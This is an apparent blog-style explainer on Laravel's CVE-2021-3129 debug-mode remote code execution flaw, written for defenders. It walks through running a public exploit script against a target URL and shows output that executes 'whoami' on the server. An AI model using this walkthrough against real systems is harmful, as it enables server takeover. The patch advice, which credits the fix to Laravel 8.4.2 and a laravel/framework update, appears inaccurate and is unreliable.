In February 2021, a security researcher discovered a serious security vulnerability in the popular PHP framework Laravel. The vulnerability, designated as CVE-2021-3129, allows attackers to execute arbitrary code on the server running the vulnerable application, potentially leading to a complete compromise of the server.
How the Exploit Works
The vulnerability stems from a flaw in the way that Laravel handles user input in its "Debug" mode. Debug mode is a feature of Laravel that allows developers to easily diagnose and troubleshoot errors in their code by displaying detailed error messages. However, if an attacker is able to provide specially crafted input to a Laravel application running in Debug mode, they can exploit this vulnerability to execute arbitrary code on the server.
Proof of concept
In this proof of concept, we will be using a script created by Joshua van der Poll to exploit the Laravel Debug vulnerability (CVE-2021-3129), which affects both Windows and Linux-based Laravel websites. You can find the script at joshuavanderpoll/CVE-2021-3129. The Python script checks for the vulnerability and allows you to execute commands on the target system.
To get started, download the script from GitHub and follow the setup steps in the README.md file. Once you have the script set up, run the command:
$ python3 CVE-2021-3129.pyYou will see the following output:
Laravel Debug Mode CVE script [•] Made by: https://github.com/joshuavanderpoll/CVE-2021-3129 [•] Using PHPGGC: https://github.com/ambionics/phpggc [?] Enter host (e.g. https://example.com/) : https://unsafe_laravel_site.com/ [@] Starting exploit on "https://unsafe_laravel_site.com/"... [@] Testing vulnerable URL https://unsafe_laravel_site.com/_ignition/execute-solution... [√] Host seems vulnerable! [@] Searching Laravel log file path... [•] Laravel seems to be running on a Windows based machine. [√] Laravel log found: "C:\inetpub\wwwroot\UnsafeLaravel\storage\logs\laravel.log". [•] Laravel version found: "7.30.4". [•] Use "?" for a list of all possible actions. [?] Please enter a command to execute:Once you see the message that the host is vulnerable, you can start executing commands. For example, you can enter the command:
execute whoamiThis will result in the following output:
[@] Executing command "whoami"... [@] Generating payloads... [√] Generated 12 payloads. [@] Trying chain laravel/rce1 [1/12]... [@] Clearing logs... [@] Causing error in logs... [√] Caused error in logs. [@] Sending payloads... [√] Sent payload. [@] Converting payload... [√] Converted payload. [√] Result: autorite nt\iusr [?] Do you want to try the next chain? [Y/N] : nAs you can see, the script allows you to execute commands on the target system if the vulnerability has not been patched. This can lead to your system being compromised and backdoored.
How to Patch the Vulnerability
The Laravel development team quickly released a patch for the vulnerability in the form of Laravel version 8.4.2. They also released a security advisory urging all Laravel users to update their applications as soon as possible.
To upgrade your Laravel installation to the patched version, simply run the following command from the root directory of your Laravel project:
composer update laravel/frameworkThis command will update your Laravel installation to the latest version, which includes the patch for CVE-2021-3129. Once you have updated your Laravel installation, you should also ensure that Debug mode is disabled in your production environment. Debug mode should only be used for development and testing, and should never be enabled in a production environment.
Summary
In summary, CVE-2021-3129 is a serious vulnerability that could potentially allow attackers to execute arbitrary code on a server running a vulnerable Laravel application. The vulnerability has been patched in Laravel version 8.4.2, so if you are running an older version of Laravel, it is critical that you upgrade your installation as soon as possible. Additionally, you should ensure that Debug mode is disabled in your production environment to minimize the risk of exploitation.